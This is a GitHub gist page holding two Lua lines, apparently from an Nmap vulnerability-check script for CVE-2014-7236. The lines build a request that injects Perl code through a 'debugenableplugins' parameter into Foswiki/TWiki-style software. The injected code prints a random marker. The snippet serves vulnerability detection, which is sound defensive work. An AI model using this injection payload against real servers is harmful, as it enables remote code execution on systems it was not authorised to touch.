-
-
Save h4ck3rk3y/b4bb278e49276e853a37 to your computer and use it in GitHub Desktop.
corrections in http-vuln-cve2014-7236
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local payload = '/'.. path .. '/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\\r\\n\\r\\n'..rand..'!")%3bexit' | |
payload = payload:gsub('//','/') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment